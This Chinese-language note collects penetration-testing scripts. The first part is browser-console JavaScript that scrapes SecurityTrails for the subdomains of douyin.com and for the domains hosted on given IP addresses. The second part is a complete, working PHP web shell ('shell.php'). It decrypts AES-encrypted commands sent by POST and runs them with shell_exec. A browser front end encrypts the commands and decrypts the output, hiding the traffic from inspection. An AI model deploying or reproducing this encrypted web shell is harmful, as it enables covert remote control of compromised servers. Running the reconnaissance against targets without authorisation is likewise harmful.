用于记录工作中使用的一些脚本
在渗透测试时信息收集中的Securitytrails反查脚本。打开浏览器控制台输入需要的函数即可。
let str = "";
const tbody = document.querySelector('tbody');
const rows = Array.from(tbody.getElementsByTagName('tr'));
rows.forEach(row => {
const link = row.querySelector('td:first-child a').innerText;
str += `${link}\n`;
});
console.log(str);
str = "";
const Get_Token = () => {
const hiddenDivs = document.getElementsByClassName('hidden');
const buildId = Array.from(hiddenDivs).find(hiddenDiv => hiddenDiv.innerHTML.includes('Build ID'))?.innerHTML.split('>')[1] || "";
return buildId;
};
const Get_Subdomain = (Domain, Page = 1) => {
const Token = Get_Token();
const url = `/_next/data/${Token}/list/apex_domain/${Domain}.json?page=${Page}&domain=${Domain}`;
fetch(url)
.then(response => response.json())
.then(data => {
const { pageProps: { apexDomainData: { data: { records } } } } = data;
records.forEach(({ hostname }) => {
str += `${hostname}\r\n`;
});
console.log(`Print Domain: ${Domain} Page: ${Page}`);
records.length === 100 ? Get_Subdomain(Domain, Page + 1) : (console.log(str), str = "");
})
.catch(error => {
console.error(`Error: ${error}`);
});
};
let str = "";
Get_Subdomain("douyin.com");
const Get_IP_Affiliation_Domain = (IP, Page = 1) => {
const Token = Get_Token();
fetch(`/_next/data/${Token}/list/ip/${IP}.json?page=${Page}&${IP}`)
.then(response => response.json())
.then(({ pageProps: { serverResponse: { data: { records } } } }) => {
records.forEach(({ hostname }) => {
str = `${str}${hostname}\r\n`;
});
console.log(`Print IP: ${IP} Page: ${String(Page)}`);
records.length === 100 ? Get_IP_Affiliation_Domain(IP, Page + 1) : console.log(str);
});
};
const Get_Token = () => {
const hiddenDivs = document.getElementsByClassName('hidden');
const buildId = Array.from(hiddenDivs).find(hiddenDiv => hiddenDiv.innerHTML.includes('Build ID'))?.innerHTML.split('>')[1] || "";
return buildId;
};
let str = "";
Get_IP_Affiliation_Domain("23.224.148.203");
const fetchSubdomainList = async (Domain, Page = 1) => {
const Token = Get_Token();
const response = await fetch(`/_next/data/${Token}/list/apex_domain/${Domain}.json?page=${Page}&domain=${Domain}`);
const { pageProps: { apexDomainData: { data: { records } } } } = await response.json();
records.forEach(({ hostname }) => {
Subdomain_list_str = `${Subdomain_list_str}${hostname}\r\n`;
});
console.log(`Print Subdomain: ${Domain} Page: ${String(Page)}`);
if (records.length === 100) {
await fetchSubdomainList(Domain, Page + 1);
}
};
const Get_IP_Affiliation_Domain = async (IP, Page = 1) => {
const Token = Get_Token();
const response = await fetch(`/_next/data/${Token}/list/ip/${IP}.json?page=${Page}&ip=${IP}`);
const { pageProps: { serverResponse: { data: { records } } } } = await response.json();
records.forEach(({ hostname }) => {
Primary_list_str = `${Primary_list_str}${hostname}\r\n`;
});
console.log(`Print Domain: ${IP} Page: ${String(Page)}`);
if (records.length === 100) {
await Get_IP_Affiliation_Domain(IP, Page + 1);
} else {
console.log(Primary_list_str);
const primaryListArray = Primary_list_str.split("\r\n").filter(hostname => hostname !== '');
for (const hostname of primaryListArray) {
await fetchSubdomainList(hostname, 1);
}
}
};
const Get_Token = () => {
const hiddenDivs = document.getElementsByClassName('hidden');
const buildId = Array.from(hiddenDivs).find(hiddenDiv => hiddenDiv.innerHTML.includes('Build ID'))?.innerHTML.split('>')[1] || "";
return buildId;
};
const Get_IP_Affiliation_SubdomainAll = async (IP) => {
await Get_IP_Affiliation_Domain(IP);
console.log(Subdomain_list_str);
};
var Subdomain_list_str = "";
var Primary_list_str = "";
Get_IP_Affiliation_SubdomainAll("77.77.77.77");
const split_add = (ipAddress) => {
const [ip, mask = "24"] = ipAddress.split("/");
return { ip, mask };
};
const sendPostRequest = async (ip, mask) => {
const url = `/api/public/app/api/vercel/ip/${ip}?mask=${mask}`;
const postData = `mask=${mask}`;
const response = await fetch(url, {
method: "POST",
body: postData,
async: false,
dataType: "text"
});
const myText = await response.text();
const jsont = JSON.parse(myText);
return jsont;
};
const Get_IP_To_Domain = async (Domain, Page = 1) => {
const response = await fetch(`/_next/data/${Token}/list/ip/${Domain}.json?page=${Page}&${Domain}`, {
method: "GET",
async: false,
dataType: "text"
});
const myText = await response.text();
const jsont = JSON.parse(myText);
const { pageProps: { serverResponse: { data: { records } } } } = jsont;
records.forEach(({ hostname }) => {
str += `${hostname}\r\n`;
});
console.log(`Print Domain: ${Domain} Page: ${String(Page)}`);
records.length === 100 ? await Get_IP_To_Domain(Domain, Page + 1) : null;
};
const Get_Token = () => {
const hiddenDivs = document.getElementsByClassName('hidden');
const buildId = Array.from(hiddenDivs).find(hiddenDiv => hiddenDiv.innerHTML.includes('Build ID'))?.innerHTML.split('>')[1] || "";
return buildId;
};
const getSites = async (ipAddress, site) => {
const { ip, mask: originalMask } = split_add(ipAddress);
if (originalMask !== "32") {
const jsonResponse = await sendPostRequest(ip, originalMask);
const rows = jsonResponse.result.rows;
for (const row of rows) {
const { sites, ip: newIpAddress } = row;
const { mask } = split_add(ip);
(sites !== 0 && mask !== "32") ? await getSites(newIpAddress, sites) : null;
}
}
if (originalMask === "32" && site !== 0) {
console.log(`ipAddress: ${ip} site: ${site}`);
await Get_IP_To_Domain(ip);
}
};
let str = "";
const Token = Get_Token();
const Run = async (ipAddress) => {
str = "";
await getSites(ipAddress);
console.log(str);
};
Run("77.77.77.77/32");
<?php
// 获取POST请求的数据
$input = file_get_contents('php://input');
// 解析json数据
$jsonObj = json_decode($input, true);
// 从POST请求中获取加密数据
$encodedData = $jsonObj['data']; // assuming data was sent via POST request
$encodedIv = $jsonObj['iv']; // assuming iv was sent via POST request
$encodedKey = $jsonObj['key']; // assuming iv was sent via POST request
//打印iv key data
// echo $encodedData . $encodedIv . $encodedKey;
// 还原加密数据
$decodedData = base64_decode($encodedData);
$decodedIv = base64_decode($encodedIv);
$decodedKey = base64_decode($encodedKey);
// AES解密
$algorithm = "aes-256-cbc";
$decryptedData = openssl_decrypt($decodedData, $algorithm, $decodedKey, OPENSSL_RAW_DATA, $decodedIv);
// 执行解密后的命令
$cmd_result = @shell_exec($decryptedData);
?>
<?php
function generateRandomBytes($length)
{
$bytes = '';
if (function_exists('openssl_random_pseudo_bytes') && (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN')) {
// OpenSSL扩展提供更好的随机数生成器
$bytes = openssl_random_pseudo_bytes($length, $strong);
if (true !== $strong) {
// 生成不安全的随机数
$bytes = '';
}
}
if ($bytes === '') {
// 如果没有可用的扩展,使用mt_rand生成种子
$bytes = '';
for ($i = 0; $i < $length; $i++) {
$bytes .= chr(mt_rand(0, 255));
}
}
return $bytes;
}
if ($cmd_result) {
$key = generateRandomBytes(32); // 密钥必须是16/24/32字节
$plaintext = $cmd_result; // 明文
$iv = generateRandomBytes(16); // 生成随机的IV
// echo "iv: " . $iv ;
// 将iv转为ascii码
// $ivord = array_map('ord', str_split($iv));
// echo json_encode($ivord);
// echo "iv: " . $iv . "key: " . $key . "plaintext: " . $plaintext ;
$ciphertext = openssl_encrypt($plaintext, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv);
$b64ciphertext = base64_encode($iv . $key . $ciphertext);
} else {
// echo "false";
}
?>
<?php $randomID = uniqid(); ?>
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<script>
// window.onload = function() {
// var b64ciphertext = "<?php echo $b64ciphertext; ?>";
// var result = document.getElementById('result');
// result.innerHTML = cryptoBase64ToStr(b64ciphertext);
// }
function Discriminator() {
var result = document.getElementById('result');
var b64ciphertext = "<?php echo $b64ciphertext; ?>";
result_innerHTML = cryptoBase64ToStr(b64ciphertext);
if(result_innerHTML == undefined){
result.innerHTML = ' ';
return ;
}
result.innerHTML = cryptoBase64ToStr(b64ciphertext);
var result_new = document.getElementById('result').innerHTML;
console.log("timer<?php echo $randomID; ?>");
var span_result = document.getElementById("result");
span_result.addEventListener("DOMSubtreeModified", span_revise, false);
}
// Uint8Array转换成Base64字符串
function arrayBufferToBase64(arrayBuffer) {
var binary = '';
var bytes = new Uint8Array(arrayBuffer);
for (var i = 0; i < bytes.byteLength; i++) {
binary += String.fromCharCode(bytes[i]);
}
return window.btoa(binary);
}
async function encryptData(data, key, iv) {
const encoder = new TextEncoder();
const encodedData = encoder.encode(data);
const encryptedData = await window.crypto.subtle.encrypt({
name: 'AES-CBC',
iv,
},
key,
encodedData
);
return encryptedData;
}
// Generate a new CryptoKey
async function generateKey() {
const aesKey = new Uint8Array(32);
window.crypto.getRandomValues(aesKey);
const aesCryptoKey = await window.crypto.subtle.importKey(
"raw",
aesKey, {
name: "AES-CBC"
},
false,
["encrypt", "decrypt"]
);
window.encodedKey_b64 = cryptoKeyToBase64(aesKey);
return aesCryptoKey;
}
//生成的key转换成base64字符串
function cryptoKeyToBase64(aesKey) {
var a = btoa(String.fromCharCode.apply(null, new Uint8Array(aesKey)));
return a;
}
//解密服务端base64字符串
function cryptoBase64ToStr(result) {
const base64ToArrayBuffer = (base64String) => {
const binaryString = window.atob(base64String);
const bytes = new Uint8Array(binaryString.length);
for (let i = 0; i < binaryString.length; i++) {
bytes[i] = binaryString.charCodeAt(i);
}
return bytes.buffer;
};
const encryptedData = base64ToArrayBuffer(result); // 将 base64 编码的数据转换为 ArrayBuffer 格式
const ivBuffer = encryptedData.slice(0, 16); // 获取前 16 位作为 iv
const keyBuffer = encryptedData.slice(16, 48); // 获取 16 到 48 位作为 key
const encryptedDataBuffer = encryptedData.slice(48); // 获取剩余部分作为加密数据
const generateKey1 = (keyMaterial) => {
return window.crypto.subtle.importKey(
'raw',
keyMaterial, {
name: 'AES-CBC'
},
false,
['decrypt']
);
};
(async () => {
const key = await generateKey1(keyBuffer); // 获取 AES 密钥
try {
const decryptedData = await window.crypto.subtle.decrypt({ // 解密操作
name: 'AES-CBC',
iv: ivBuffer
}, key, encryptedDataBuffer);
window.plaintext = new TextDecoder().decode(decryptedData); // 将解密数据转回字符串
console.log(plaintext); // 显示解密后的明文
} catch (error) {
console.error(error); // 输出错误信息
}
})();
return window.plaintext;
}
//开始执行
async function example() {
clearInterval(timer<?php echo $randomID; ?>);
// const data = "Hello, world!";
//从input标签获取数据
const data_value = document.getElementById("data").value;
const key = await generateKey();
const iv = window.crypto.getRandomValues(new Uint8Array(16));
const encryptedData = await encryptData(data_value, key, iv);
// console.log(encryptedData);
//结果base64编码
const encryptedData_b64 = arrayBufferToBase64(encryptedData);
const encodeiv_b64 = arrayBufferToBase64(iv);
const encodedKey_b64 = window.encodedKey_b64;
// //发送到服务器
// fetch('shell.php', {
// method: 'POST',
// headers: {
// 'Content-Type': 'application/json'
// },
// body: JSON.stringify({
// data: encryptedData_b64,
// iv: encodeiv_b64,
// key: encodedKey_b64
// })
// })
// // .then(response => response.text())
// .then(result => console.log(result))
// .catch(error => console.error(error));
// }
// 定义要发送的数据
var data = JSON.stringify({
data: encryptedData_b64,
iv: encodeiv_b64,
key: encodedKey_b64
});
// 创建一个 AJAX 对象
var xhr = new XMLHttpRequest();
// 配置请求参数
xhr.open('POST', 'shell.php', true); // 注意将 API 地址替换为实际地址
xhr.setRequestHeader('Content-Type', 'application/json');
// 定义 AJAX 回调函数
xhr.onload = function() {
if (xhr.status === 200) {
if (document.getElementById('Temporary')) {
// 选中 Temporary 元素
var elem = document.getElementById('Temporary');
// 删除 Temporary 元素
elem.parentNode.removeChild(elem);
}
// 创建一个临时的div元素,用于解析 HTML 页面内容
var tempDiv = document.createElement('div');
tempDiv.innerHTML = xhr.responseText;
// 找到要执行的 JavaScript 代码片段,并将其插入到页面中
var scriptTag = tempDiv.querySelector('script');
if (scriptTag) {
// 获取要执行的 JavaScript 代码
var scriptCode = scriptTag.innerHTML;
// 创建一个新的 script 标签,在页面中插入新的 script 标签,并将要执行的代码添加到其中
var scriptEl = document.createElement('script');
scriptEl.setAttribute("id", "Temporary");
scriptEl.innerHTML = scriptCode;
document.body.appendChild(scriptEl);
}
} else {
alert('Request failed. Error code: ' + xhr.status);
}
};
// 发送 AJAX 请求
xhr.send(data);
}
let timer<?php echo $randomID; ?> = setInterval(Discriminator, 1000);
function span_revise() {
clearInterval(timer<?php echo $randomID; ?>);
}
// example();
</script>
<input type="text" id="data" value="">
<input type="submit" value="提交" onclick="example()">
<span id='result'></span>
<script>
function span_revise() {
clearInterval(timer<?php echo $randomID; ?>);
}
var span_result = document.getElementById("result");
span_result.addEventListener("DOMSubtreeModified", span_revise, false);
</script>
</body>
</html>